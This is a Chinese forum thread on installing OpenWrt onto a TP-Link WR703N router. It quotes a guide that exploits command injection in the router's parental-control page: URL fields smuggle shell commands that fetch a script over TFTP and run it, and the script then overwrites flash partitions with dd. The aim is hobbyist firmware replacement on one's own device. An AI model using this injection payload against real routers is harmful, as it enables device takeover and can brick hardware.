找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888
楼主: greenvag

找到国外牛人给出的不通过TTL刷openwrt到1.7版本的703n的方法

 火... [复制链接]
发表于 2015-2-5 20:25 | 显示全部楼层
求翻译
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2015-2-5 21:10 | 显示全部楼层
interdev 发表于 2015-2-5 01:18
谢谢楼主提供信息,我也折腾成功了。牛人利用的是一个TP Link路由器的通用漏洞,估计绝大多数TP,水星相 ...

那个busybox不需要了吗?你的附件里没有

点评

这个和后面提供的那个是同一个东西吗?  详情 回复 发表于 2015-3-5 15:28
里面有个 txt 文档,有网址,自己下载。 本来一起打包进去了,但超过了1M,恩山不让传,所以删除了。 http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/openwrt-ar71xx-generic-tl-wr7  详情 回复 发表于 2015-2-5 22:03
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2015-2-5 22:03 | 显示全部楼层
raym55 发表于 2015-2-5 21:10
那个busybox不需要了吗?你的附件里没有

里面有个 txt 文档,有网址,自己下载。

本来一起打包进去了,但超过了1M,恩山不让传,所以删除了。

http://downloads.openwrt.org/att ... quashfs-factory.bin

http://www.busybox.net/downloads/binaries/1.16.1/busybox-mips

点评

运行第一条命令就不行,大神帮忙看看是什么问题 C:\Users\Hou>curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%2 0YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true' 'http://192.168.1.1/' c  详情 回复 发表于 2015-2-8 09:45
先试试,单元不会变砖  详情 回复 发表于 2015-2-5 23:30
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2015-2-5 23:30 | 显示全部楼层
interdev 发表于 2015-2-5 22:03
里面有个 txt 文档,有网址,自己下载。

本来一起打包进去了,但超过了1M,恩山不让传,所以删除了。
...

先试试,单元不会变砖

点评

成功了别忘了分享  详情 回复 发表于 2015-2-6 08:28
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2015-2-6 08:14 | 显示全部楼层
坐等楼主出小白版教程。先谢了。
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2015-2-6 08:28 | 显示全部楼层
raym55 发表于 2015-2-5 23:30
先试试,单元不会变砖

成功了别忘了分享

点评

试了下不行,还是等小白版教程吧  详情 回复 发表于 2015-2-6 10:06
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2015-2-6 10:06 | 显示全部楼层
5195185 发表于 2015-2-6 08:28
成功了别忘了分享

试了下不行,还是等小白版教程吧
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2015-2-6 10:44 | 显示全部楼层
本帖最后由 raym55 于 2015-2-6 10:59 编辑

求win下图文教程

  • You'll need:你需要准备的东西
  • * A FTP server (in my case 192.168.1.9, I advise to use the same IP or understand what the hell you're doing) 一个ftp服务端,作者的是192.168.1.9
  • * An unix or mac workstation with curl (can be the same box)一个含curl的unix或者mac平台
  • * A general knowledge of unix commands.一些unix命令只是
  • * An openwrt image. I make my own but stock 12.09 might work.一个可用固件,作者用的自制的
  • * A binary busybox for mips static compiled.静态编译的busybox。13楼和18楼有需要的文件的下载链接
  • The general idea:思路
  • * Put a script on your tp-link wr703n。在wr703n上放个脚本
  • * Put a better busybox on your tp-link wr703n。wr703n上放个busybox
  • * Trick the wr703n into executing some commands to run this script.提权运行脚本
  • The script:脚本
  • * get the first en second part of the image from tftp。得到把固件的第一部分和第二部分
  • * flash the first part of the image (1024k) to the mtd partition named kernel,把第一部分刷进内核
  • * flash the rest of the image (2819k) to the mtd partition named rootfs,把第二部分刷进 rootfs
  • * reboot the box with openwrt on it. 重启?
  • First setup the tftp server and put the following files there:下面是作者用到的命令,看不懂。
  • === file aa cut from here ======
  • cd /tmp
  • tftp -gl i1 192.168.1.9
  • tftp -gl i2 192.168.1.9
  • tftp -gl busybox 192.168.1.9
  • chmod 755 busybox
  • ./busybox dd if=i1 of=/dev/mtdblock1 conv=fsync
  • ./busybox dd if=i2 of=/dev/mtdblock2 conv=fsync
  • ./busybox reboot -f
  • echo blaaat
  • === /file aa cut to here =======
  • Put the rest also there:
  • * busybox
  • * openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin
  • Cut the openwrt image in 2 parts. (Yes these commands):把固件分割为两部分,i1和i2
  •   These commands can take a while since I had no interrest in calculating a better blocksize.
  • dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i1 bs=1 count=1048576
  • dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i2 bs=1 skip=1048576
  • now there are 4 files in your TFTP directory: aa, busybox, i1, i2
  • Now let's take a router and have it set to the factory settings.把路由器恢复出厂值
  • Run these commands on you're workstation.运行下面的命令
  • # !!DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).!!
  • # First it wants a password set, let's do that. (the password is admin42 after this).
  • curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true' 'http://192.168.1.1/'
  • # Secondly it wants to have parental control enabled (probably the once in a lifetime opportunity to use this).
  • curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1'
  • # That being done, now all we need is to just simply exploit the router.
  • 刷完了,下面不知道什么意思
  • # readable it does:
  • # cd /tmp ; tftp -gl aa 192.168.1.9; sh aa
  • # DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).
  • curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.9;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6'
  • # DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).
  • Just wait until it starts to blink, than openwrt is loading. Depending on your image you can reach it on it's mac address.

我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2015-2-6 12:30 | 显示全部楼层
求小白教程

点评

把路由器恢复默认设置 把电脑IP改为192.168.1.100 进入该目录,先运行tftp32 然后进入cmd命令行,进入该目录,键入命令 curl -o - -b "tLargeScreenP=1;subType=pcSub;Authorization=Basic%20YWRtaW46YWRt  详情 回复 发表于 2015-2-16 21:19
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2015-2-6 12:33 | 显示全部楼层
大概看懂了 但是  curl 执行的有问题! 不知道怎么弄

点评

你那是这个错误吗? C:\Users\Hou>curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%2 0YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true' 'http://192.168.1.1/' curl: (6) Could not resol  详情 回复 发表于 2015-2-8 16:29
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2015-2-6 16:09 来自手机 | 显示全部楼层
mark一下
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2015-2-6 16:19 | 显示全部楼层
{:soso_e160:}老等
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2015-2-7 19:59 | 显示全部楼层
继续顶
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2015-2-7 20:09 | 显示全部楼层

不错,学习一下
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2015-2-7 20:10 | 显示全部楼层

不错,学习一下
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

有疑问请添加管理员QQ86788181|手机版|小黑屋|Archiver|恩山无线论坛(常州市恩山计算机开发有限公司版权所有) ( 苏ICP备05084872号 )

GMT+8, 2024-3-28 20:45

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

| 江苏省互联网有害信息举报中心 举报信箱:js12377 | @jischina.com.cn 举报电话:025-88802724 本站不良内容举报信箱:68610888@qq.com 举报电话:0519-86695797

快速回复 返回顶部 返回列表